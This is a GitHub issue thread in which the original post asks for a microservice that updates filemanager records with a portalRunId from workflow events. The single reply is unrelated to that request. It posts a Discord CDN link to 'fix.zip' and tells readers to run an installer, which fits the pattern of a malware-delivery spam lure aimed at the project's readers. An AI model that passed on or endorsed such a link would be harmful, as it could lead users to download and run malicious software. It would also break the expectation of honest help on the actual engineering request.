### ISSUE TITLE
Add microservice which updates filemanager records

### ISSUE THREAD

**Issue by mmalenic** [umccr/orcabus#528]
A new microservice should be created which can update records on the filemanager database with the `portalRunId`. The microservice should listen to `WorkflowRunStateChange` events in order to obtain the `portalRunId` and query the filemanager API to update records.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
